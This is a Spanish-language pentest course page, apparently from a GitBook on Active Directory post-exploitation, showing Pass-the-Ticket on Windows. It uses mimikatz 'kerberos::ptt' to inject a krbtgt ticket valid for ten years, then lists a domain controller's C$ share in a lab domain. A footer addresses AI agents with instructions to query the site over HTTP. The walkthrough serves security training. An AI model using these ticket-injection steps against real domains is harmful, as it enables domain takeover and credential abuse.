> For the complete documentation index, see [llms.txt](https://books.spartan-cybersec.com/cpad/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://books.spartan-cybersec.com/cpad/persistencia-y-post-explotacion-en-ad/pass-the-ticket/ptt-en-windows.md). # PTT en Windows {% hint style="info" %} Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos! {% endhint %} La principal diferencia entre implementar PTT en Windows y Linux/Unix radica en el manejo de los tickets y las herramientas utilizadas. En Windows, Mimikatz maneja directamente la extracción e inyección de tickets. En cambio, en Linux/Unix, se requiere un paso adicional para [convertir el ticket a un formato compatible](/cpad/persistencia-y-post-explotacion-en-ad/pass-the-ticket/ptt-en-linux.md) y luego utilizar herramientas nativas de Kerberos para su uso. ```bash PS C:\Users\admin\Desktop\SHARED> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # kerberos::ptt evil.tck * File: 'evil.tck': OK mimikatz # exit Bye! ``` Despues de ejecutar lo anterior, podemos interactuar con los permisos de este ticket: ```bash PS C:\Users\admin\Desktop\SHARED> klist Current LogonId is 0:0x42e63 Cached Tickets: (1) #0> Client: Administrator @ spartancybersec.corp Server: krbtgt/spartancybersec.corp @ spartancybersec.corp KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent Start Time: 11/23/2023 14:40:54 (local) End Time: 11/20/2033 14:40:54 (local) Renew Time: 11/20/2033 14:40:54 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called: PS C:\Users\admin\Desktop\SHARED> dir \\First-DC.spartancybersec.corp\c$ Directory: \\First-DC.spartancybersec.corp\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/14/2018 6:56 AM EFI d----- 11/18/2023 4:22 PM NTDS d----- 5/13/2020 5:58 PM PerfLogs d-r--- 9/19/2022 11:23 PM Program Files d----- 9/19/2022 11:47 PM Program Files (x86) d-r--- 9/19/2022 11:40 PM Users d----- 11/23/2023 11:42 PM Windows ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://books.spartan-cybersec.com/cpad/persistencia-y-post-explotacion-en-ad/pass-the-ticket/ptt-en-windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.